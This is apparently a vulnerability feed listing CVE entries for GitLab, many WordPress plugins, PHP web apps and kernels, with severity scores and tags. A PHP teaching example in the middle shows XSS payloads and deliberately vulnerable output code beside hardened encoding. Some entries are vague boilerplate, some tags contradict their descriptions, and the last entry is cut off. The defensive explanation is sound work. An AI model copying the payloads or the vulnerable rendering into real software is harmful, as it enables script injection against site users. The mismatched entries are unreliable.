CVE-2024-4994 is a Cross-Site Request Forgery (CSRF) vulnerability in GitLab's GraphQL API that allows unauthenticated attackers to execute arbitrary GraphQL mutations through a malicious website visited by authenticated GitLab users. This affects GitLab CE/EE versions 16.1.0-16.11.4, 17.0.0-17.0.2, and 17.1.0, with a CVSS score of 8.1 indicating high severity. The vulnerability requires user interaction (clicking a malicious link) but can result in unauthorized data manipulation or system compromise depending on the mutations executed.
CSRF
Gitlab
RCE
-
CVE-2025-52733
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anonform Ab ANON::form embedded secure form allows DOM-Based XSS. This issue affects ANON::form embedded secure form: from n/a through 1.7.
XSS
-
CVE-2025-52719
MEDIUM
CVSS 4.3
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Metagauss ProfileGrid allows Retrieve Embedded Sensitive Data. This issue affects ProfileGrid : from n/a through 5.9.5.2.
Information Disclosure
-
CVE-2025-52713
MEDIUM
CVSS 6.4
Server-Side Request Forgery (SSRF) vulnerability in BoldGrid Post and Page Builder by BoldGrid - Visual Drag and Drop Editor allows Server Side Request Forgery. This issue affects Post and Page Builder by BoldGrid - Visual Drag and Drop Editor: from n/a through 1.27.8.
SSRF
-
CVE-2025-52711
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in BoldGrid Post and Page Builder by BoldGrid - Visual Drag and Drop Editor allows Cross Site Request Forgery. This issue affects Post and Page Builder by BoldGrid - Visual Drag and Drop Editor: from n/a through 1.27.8.
CSRF
-
CVE-2025-52710
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ninja Team File Manager Pro allows Stored XSS. This issue affects File Manager Pro: from n/a through 1.8.8.
XSS
-
CVE-2025-52707
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FirelightWP Firelight Lightbox allows Stored XSS. This issue affects Firelight Lightbox: from n/a through 2.3.16.
XSS
-
CVE-2025-50054
MEDIUM
CVSS 5.5
Buffer overflow in OpenVPN ovpn-dco-win version 1.3.0 and earlier and version 2.5.8 and earlier allows a local user process to send a too large control message buffer to the kernel driver, resulting in a system crash.
Buffer Overflow
Heap Overflow
Ovpn Dco Win
-
CVE-2025-50051
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chad Butler WP-Members allows Stored XSS. This issue affects WP-Members: from n/a through 3.5.4.
XSS
-
CVE-2025-50050
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress allows Stored XSS. This issue affects Jobs for WordPress: from n/a through 2.7.12.
WordPress
XSS
PHP
-
CVE-2025-50049
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in prismtechstudios Modern Footnotes allows Stored XSS. This issue affects Modern Footnotes: from n/a through 1.4.19.
XSS
-
CVE-2025-50048
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atakan Au Automatically Hierarchic Categories in Menu allows Stored XSS. This issue affects Automatically Hierarchic Categories in Menu: from n/a through 2.0.9.
XSS
-
CVE-2025-50047
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webvitaly Sitekit allows Stored XSS. This issue affects Sitekit: from n/a through 1.9.
XSS
-
CVE-2025-50046
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
XSS
-
CVE-2025-50045
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ProWCPlugins Related Products Manager for WooCommerce allows DOM-Based XSS. This issue affects Related Products Manager for WooCommerce: from n/a through 1.6.2.
WordPress
XSS
PHP
-
CVE-2025-50044
MEDIUM
CVSS 6.5
Cross-Site Request Forgery (CSRF) vulnerability in Rameez Iqbal Real Estate Manager allows Cross Site Request Forgery. This issue affects Real Estate Manager: from n/a through 7.3.
CSRF
-
CVE-2025-50043
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jordy Meow Code Engine allows Stored XSS. This issue affects Code Engine: from n/a through 0.3.2.
XSS
-
CVE-2025-50042
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aviplugins.com WP Register Profile With Shortcode allows Stored XSS. This issue affects WP Register Profile With Shortcode: from n/a through 3.6.1.
XSS
-
CVE-2025-50041
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Engine Gutenberg Blocks - ACF Blocks Suite allows Stored XSS. This issue affects Gutenberg Blocks - ACF Blocks Suite: from n/a through 2.6.11.
XSS
-
CVE-2025-50038
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anantaddons Anant Addons for Elementor allows Stored XSS. This issue affects Anant Addons for Elementor: from n/a through 1.2.0.
XSS
-
CVE-2025-50037
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Buying Buddy Buying Buddy IDX CRM allows DOM-Based XSS. This issue affects Buying Buddy IDX CRM: from n/a through 2.3.0.
XSS
-
CVE-2025-50036
MEDIUM
CVSS 6.5
Cross-Site Request Forgery (CSRF) vulnerability in Yamna Khawaja Mailing Group Listserv allows Cross Site Request Forgery. This issue affects Mailing Group Listserv: from n/a through 3.0.5.
CSRF
-
CVE-2025-50035
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CyrilG Fyrebox Quizzes allows Stored XSS. This issue affects Fyrebox Quizzes: from n/a through 3.0.
XSS
-
CVE-2025-50034
MEDIUM
CVSS 6.5
A Missing Authorization vulnerability in a Mahmudul product (CVSS 6.5). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-50033
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sparkle Themes Fitness Park allows DOM-Based XSS. This issue affects Fitness Park: from n/a through 1.1.1.
XSS
-
CVE-2025-50030
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sparkle Themes Spark Multipurpose allows DOM-Based XSS. This issue affects Spark Multipurpose: from n/a through 1.0.7.
XSS
-
CVE-2025-50027
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xootix Login/Signup Popup allows Stored XSS. This issue affects Login/Signup Popup: from n/a through 2.9.4.
XSS
-
CVE-2025-50026
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in spoki Spoki allows Stored XSS. This issue affects Spoki: from n/a through 2.16.0.
XSS
-
CVE-2025-50025
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codepeople CP Polls allows Stored XSS. This issue affects CP Polls: from n/a through 1.0.81.
XSS
-
CVE-2025-50024
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Truong Thanh ATP Call Now allows Stored XSS. This issue affects ATP Call Now: from n/a through 1.0.3.
XSS
-
CVE-2025-50023
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Coyier CodePen Embed Block allows Stored XSS. This issue affects CodePen Embed Block: from n/a through 1.1.1.
XSS
-
CVE-2025-50022
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in justin_k WP-FB-AutoConnect allows Stored XSS. This issue affects WP-FB-AutoConnect: from n/a through 4.6.3.
XSS
-
CVE-2025-50021
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Robert Peake Better Random Redirect allows Stored XSS. This issue affects Better Random Redirect: from n/a through 1.3.20.
XSS
-
CVE-2025-50020
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nitin Yawalkar RDFa Breadcrumb allows Stored XSS. This issue affects RDFa Breadcrumb: from n/a through 2.3.
XSS
-
CVE-2025-50019
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sandor Kovacs Simple Sticky Footer allows Stored XSS. This issue affects Simple Sticky Footer : from n/a through 1.3.5.
XSS
-
CVE-2025-50018
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tealium Tealium allows Stored XSS. This issue affects Tealium: from n/a through 2.1.17.
XSS
-
CVE-2025-50017
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt WP Voting Contest allows Stored XSS. This issue affects WP Voting Contest: from n/a through 5.8.
XSS
-
CVE-2025-50016
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in brijeshk89 IP Based Login allows Stored XSS. This issue affects IP Based Login: from n/a through 2.4.2.
XSS
-
CVE-2025-50015
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rodrigo Bastos Hand Talk allows Stored XSS. This issue affects Hand Talk: from n/a through 6.0.
XSS
-
CVE-2025-50014
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iamapinan PDPA Consent for Thailand allows Stored XSS. This issue affects PDPA Consent for Thailand: from n/a through 1.1.1.
XSS
-
CVE-2025-50013
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jason Judge CSV Importer Improved allows Stored XSS. This issue affects CSV Importer Improved: from n/a through 0.6.1.
XSS
-
CVE-2025-50012
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fridaysystems Inventory Presser allows Stored XSS. This issue affects Inventory Presser: from n/a through 15.0.0.
XSS
-
CVE-2025-50011
MEDIUM
CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Félix Martínez Recipes manager - WPH allows Stored XSS. This issue affects Recipes manager - WPH: from n/a through 1.0.4.
XSS
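Worked example, added here and not taken from any of the plugins above: the "Improper Neutralization of Input During Web Page Generation" entries all come down to writing a stored value into HTML without encoding it for the context it lands in. This pure-PHP block renders three constructed stored values into three contexts (element body, single-quoted attribute, href) first the vulnerable way and then with context-aware encoding. The field names, payloads and page fragment are invented for the demo.

```php
<?php
// Added example (not code from any plugin listed above). Stored values,
// field names and the page fragment are constructed for this demo.
declare(strict_types=1);

// What an attacker would have saved through the plugin's form (constructed).
$stored = [
    'title' => '<script>alert(1)</script>',
    'color' => "' onmouseover='alert(1)",   // breaks out of a single-quoted attribute
    'link'  => 'javascript:alert(1)',        // scheme abuse inside an href
];

// Vulnerable rendering: the title is echoed raw; the attribute value goes
// through htmlspecialchars() with ENT_COMPAT, which encodes only double
// quotes (this was the default before PHP 8.1); the link is echoed raw.
function renderVulnerable(array $v): string {
    return "<h2>{$v['title']}</h2>\n"
         . "<div style='color:" . htmlspecialchars($v['color'], ENT_COMPAT) . "'>...</div>\n"
         . "<a href='{$v['link']}'>site</a>\n";
}

// Hardened: encode for the context. ENT_QUOTES escapes both quote characters,
// so the value cannot terminate either kind of attribute; URLs are checked
// against a scheme allow-list before being attribute-encoded.
function encHtml(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function safeUrl(string $url): string {
    $parts = parse_url($url);
    if ($parts === false) {
        return '#';
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https', ''], true) ? $url : '#';
}

function renderHardened(array $v): string {
    return "<h2>" . encHtml($v['title']) . "</h2>\n"
         . "<div style='color:" . encHtml($v['color']) . "'>...</div>\n"
         . "<a href='" . encHtml(safeUrl($v['link'])) . "'>site</a>\n";
}

echo "--- vulnerable ---\n", renderVulnerable($stored);
echo "--- hardened ---\n", renderHardened($stored);
```

In the vulnerable output the script tag survives, the style attribute is closed early and an onmouseover handler appears, and the javascript: link is clickable; in the hardened output every one of those is inert text. The point the advisories share is that "sanitizing" on input (sanitize_text_field and friends) does not replace encoding on output, because the same stored string is safe in one context and live in another. In WordPress code the equivalents are esc_html() for element content, esc_attr() for attribute values and esc_url() for hrefs, which also handles scheme tricks (leading whitespace, control characters, mixed case) that the small allow-list above does not.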
-
CVE-2025-50010
MEDIUM
CVSS 5.4
Missing Authorization vulnerability in Zapier Zapier for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zapier for WordPress: from n/a through 1.5.2.
WordPress
Authentication Bypass
PHP
-
CVE-2025-50009
MEDIUM
CVSS 5.4
Missing Authorization vulnerability in Climax Themes Kata Plus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Kata Plus: from n/a through 1.5.3.
Authentication Bypass
-
CVE-2025-50008
MEDIUM
CVSS 5.4
A remote code execution vulnerability (CVSS 5.4). Remediation should follow standard vulnerability management procedures.
WordPress
Authentication Bypass
PHP
-
CVE-2025-49998
MEDIUM
CVSS 5.4
Missing Authorization vulnerability in Wetail WooCommerce Fortnox Integration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce Fortnox Integration: from n/a through 4.5.5.
WordPress
Authentication Bypass
PHP
-
CVE-2025-49997
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in Syed Balkhi Giveaways and Contests by RafflePress allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Giveaways and Contests by RafflePress: from n/a through 1.12.17.
Authentication Bypass
-
CVE-2025-49996
MEDIUM
CVSS 5.3
A security vulnerability in osama (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49995
MEDIUM
CVSS 5.3
CVE-2025-49995 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49993
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in Cookie Script Cookie-Script.com allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cookie-Script.com: from n/a through 1.2.1.
Authentication Bypass
-
CVE-2025-49991
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in tggfref WP-Recall (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49990
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in contentstudio ContentStudio (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49989
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in App Cheap App Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects App Builder: from n/a through 5.5.3.
Authentication Bypass
-
CVE-2025-49988
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in Renzo Contact Form 7 AWeber Extension allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form 7 AWeber Extension: from n/a through 0.1.38.
Authentication Bypass
-
CVE-2025-49987
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in WPFactory CRM ERP Business Solution allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CRM ERP Business Solution: from n/a through 1.13.
Authentication Bypass
-
CVE-2025-49986
MEDIUM
CVSS 5.3
Missing Authorization vulnerability in thanhtungtnt Video List Manager (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49985
MEDIUM
CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Ali Irani Auto Upload Images allows Server Side Request Forgery. This issue affects Auto Upload Images: from n/a through 3.3.2.
SSRF
-
CVE-2025-49984
MEDIUM
CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Angelo Mandato PowerPress Podcasting allows Server Side Request Forgery. This issue affects PowerPress Podcasting: from n/a through 11.12.11.
SSRF
-
CVE-2025-49983
MEDIUM
CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Joe Hoyle WPThumb allows Server Side Request Forgery. This issue affects WPThumb: from n/a through 0.10.
SSRF
-
CVE-2025-49982
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in aguilatechnologies WP Customer Area (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49981
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in mahabub81 User Roles and Capabilities (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49980
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in WP Event Manager WP User Profile Avatar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP User Profile Avatar: from n/a through 1.0.6.
Authentication Bypass
-
CVE-2025-49979
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in slui Media Hygiene (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49978
MEDIUM
CVSS 4.3
CVE-2025-49978 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49977
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in WP Inventory WP Inventory Manager allows Cross Site Request Forgery. This issue affects WP Inventory Manager: from n/a through 2.3.4.
CSRF
-
CVE-2025-49976
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in WANotifier WANotifier allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WANotifier: from n/a through 2.7.7.
Authentication Bypass
-
CVE-2025-49975
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Hossni Mubarak JobWP allows Cross Site Request Forgery. This issue affects JobWP: from n/a through 2.4.0.
CSRF
-
CVE-2025-49974
MEDIUM
CVSS 4.3
A security vulnerability in a Project Management (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
WordPress
Authentication Bypass
PHP
-
CVE-2025-49973
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in GrandPlugins Image Sizes Controller, Create Custom Image Sizes, Disable Image Sizes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Sizes Controller, Create Custom Image Sizes, Disable Image Sizes: from n/a through 1.0.9.
Authentication Bypass
-
CVE-2025-49972
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in David Wood TM Replace Howdy allows Cross Site Request Forgery. This issue affects TM Replace Howdy: from n/a through 1.4.2.
CSRF
-
CVE-2025-49971
MEDIUM
CVSS 4.3
CVE-2025-49971 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49970
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in sparklewpthemes Hello FSE Blog (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49969
MEDIUM
CVSS 4.3
Missing Authorization vulnerability in Zara 4 Zara 4 Image Compression allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zara 4 Image Compression: from n/a through 1.2.17.2.
Authentication Bypass
-
CVE-2025-49968
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro XML Travel Portal Widget allows Cross Site Request Forgery. This issue affects XML Travel Portal Widget: from n/a through 2.0.
CSRF
-
CVE-2025-49967
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in marcusjansen Live Sports Streamthunder allows Cross Site Request Forgery. This issue affects Live Sports Streamthunder: from n/a through 2.1.
CSRF
-
CVE-2025-49966
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro Oganro Travel Portal Search Widget for HotelBeds APITUDE API allows Cross Site Request Forgery. This issue affects Oganro Travel Portal Search Widget for HotelBeds APITUDE API: from n/a through 1.0.
CSRF
-
CVE-2025-49965
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro PixelBeds Channel Manager and Hotel Booking Engine allows Cross Site Request Forgery. This issue affects PixelBeds Channel Manager and Hotel Booking Engine: from n/a through 1.0.
CSRF
-
CVE-2025-49964
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in indgeek ClipLink allows Cross Site Request Forgery. This issue affects ClipLink: from n/a through 1.1.
CSRF
-
CVE-2025-48058
MEDIUM
CVSS 6.3
PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to version 6.7.2, there is a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the PowSyBl's DataSource mechanism. If successfully exploited, a malicious actor can cause significant CPU consumption due to regex backtracking - even with polynomial patterns. This issue has been patched in com.powsybl:powsybl-commons: 6.7.2.
Denial Of Service
-
CVE-2025-46158
MEDIUM
CVSS 6.2
An issue in redoxOS kernel before commit 5d41cd7c allows a local attacker to cause a denial of service via the `setitimer` syscall.
Denial Of Service
Redox
-
CVE-2025-38083
MEDIUM
CVSS 4.7
In the Linux kernel, the following vulnerability has been resolved:
net_sched: prio: fix a race in prio_tune()
Gerrard Tai reported a race condition in PRIO, whenever SFQ perturb timer
fires at the wrong time.
The race is as follows:
CPU 0                                 CPU 1
[1]: lock root
[2]: qdisc_tree_flush_backlog()
[3]: unlock root
 |
 |                                    [5]: lock root
 |                                    [6]: rehash
 |                                    [7]: qdisc_tree_reduce_backlog()
 |
[4]: qdisc_put()
This can be abused to underflow a parent's qlen.
Calling qdisc_purge_queue() instead of qdisc_tree_flush_backlog()
should fix the race, because all packets will be purged from the qdisc
before releasing the lock.
Race Condition
Information Disclosure
Linux
Ubuntu
Debian
-
CVE-2025-32876
MEDIUM
CVSS 6.8
An issue was discovered on COROS PACE 3 devices through 3.0808.0. The BLE implementation of the COROS smartwatch does not support LE Secure Connections and instead enforces BLE Legacy Pairing. In BLE Legacy Pairing, the Short-Term Key (STK) can be easily guessed. This requires knowledge of the Temporary Key (TK), which, in the case of the COROS Pace 3, is set to 0 due to the Just Works pairing method. An attacker within Bluetooth range can therefore perform sniffing attacks, allowing eavesdropping on the communication.
Authentication Bypass
Coros Pace 3 Firmware
-
CVE-2025-32875
MEDIUM
CVSS 5.7
An issue was discovered in the COROS application through 3.8.12 for Android. Bluetooth pairing and bonding is neither initiated nor enforced by the application itself. Also, the watch does not enforce pairing and bonding. As a result, any data transmitted via BLE remains unencrypted, allowing attackers within Bluetooth range to eavesdrop on the communication. Furthermore, even if a user manually initiates pairing and bonding in the Android settings, the application continues to transmit data without requiring the watch to be bonded. This fallback behavior enables attackers to exploit the communication, for example, by conducting an active machine-in-the-middle attack.
Authentication Bypass
Google
Android
-
CVE-2025-32753
MEDIUM
CVSS 5.3
Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.1, contains an improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service, information disclosure, and information tampering.
SQLi
Information Disclosure
Denial Of Service
Dell
Powerscale Onefs
-
CVE-2025-6365
MEDIUM
CVSS 5.7
A vulnerability was found in HobbesOSR Kitten up to c4f8b7c3158983d1020af432be1b417b28686736 and classified as critical. Affected by this issue is the function set_pte_at in the library /include/arch-arm64/pgtable.h. The manipulation leads to resource consumption. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.
Denial Of Service
Kitten
-
CVE-2025-6352
MEDIUM
CVSS 5.3
A vulnerability classified as problematic (CVSS 5.3). Risk factors: public PoC available.
PHP
Information Disclosure
Automated Voting System
-
CVE-2025-6351
MEDIUM
CVSS 6.3
A vulnerability was found in itsourcecode Employee Record Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /editprofile.php. The manipulation of the argument emp1name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Employee Management System
-
CVE-2025-6346
MEDIUM
CVSS 6.3
A vulnerability was found in SourceCodester Advance Charity Management System 1.0. It has been classified as critical. This affects an unknown part of the file /members/fundDetails.php. The manipulation of the argument m06 leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Advance Charity Management System
-
CVE-2025-6341
MEDIUM
CVSS 4.3
A vulnerability classified as problematic was found in code-projects School Fees Payment System 1.0. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
CSRF
School Fees Payment System
-
CVE-2025-6335
MEDIUM
CVSS 4.7
A vulnerability was found in DedeCMS up to 5.7.2 and classified as critical. This issue affects some unknown processing of the file /include/dedetag.class.php of the component Template Handler. The manipulation of the argument notes leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
Command Injection
Dedecms
-
CVE-2025-6333
MEDIUM
CVSS 6.3
A vulnerability, which was classified as critical, was found in PHPGurukul Directory Management System 2.0. This affects an unknown part of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Directory Management System
-
CVE-2025-6332
MEDIUM
CVSS 6.3
A vulnerability, which was classified as critical, has been found in PHPGurukul Directory Management System 2.0. Affected by this issue is some unknown functionality of the file /admin/manage-directory.php. The manipulation of the argument del leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Directory Management System
-
CVE-2025-6331
MEDIUM
CVSS 6.3
A vulnerability classified as critical was found in PHPGurukul Directory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search-directory.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Directory Management System
-
CVE-2025-6329
MEDIUM
CVSS 5.4
A vulnerability was found in ScriptAndTools Real Estate Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file userdelete.php of the component User Delete Handler. The manipulation of the argument ID leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
Authentication Bypass
Real Estate Management System
-
CVE-2025-6321
MEDIUM
CVSS 6.3
A vulnerability has been found in PHPGurukul Pre-School Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument sadminusername leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6320
MEDIUM
CVSS 6.3
A vulnerability, which was classified as critical, was found in PHPGurukul Pre-School Enrollment System 1.0. Affected is an unknown function of the file /admin/add-class.php. The manipulation of the argument classname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6319
MEDIUM
CVSS 6.3
A vulnerability, which was classified as critical, has been found in PHPGurukul Pre-School Enrollment System 1.0. This issue affects some unknown processing of the file /admin/add-teacher.php. The manipulation of the argument tsubject leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6309
MEDIUM
CVSS 6.3
A vulnerability classified as critical was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-ambulance.php. The manipulation of the argument ambregnum leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Emergency Ambulance Hiring Portal
-
CVE-2025-6308
MEDIUM
CVSS 6.3
A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/bwdates-request-report-details.php. The manipulation of the argument fromdate/todate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
Emergency Ambulance Hiring Portal
-
CVE-2025-6299
MEDIUM
CVSS 4.7
A vulnerability classified as critical has been found in TOTOLINK N150RT 3.4.0-B20190525. This affects an unknown part of the file /boa/formWSC. The manipulation of the argument targetAPSsid leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
Command Injection
N150rt Firmware
TOTOLINK
-
CVE-2025-6264
MEDIUM
CVSS 5.5
Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifacts, Velociraptor allows for those to require high permissions like EXECVE to launch.
The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration.
This can lead to arbitrary command execution and endpoint takeover.
To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT permission given typically by the "Investigator" role).
Privilege Escalation
Velociraptor
Suse
-
CVE-2025-6257
MEDIUM
CVSS 6.4
The Euro FxRef Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currency shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
PHP
-
CVE-2025-6193
MEDIUM
CVSS 5.9
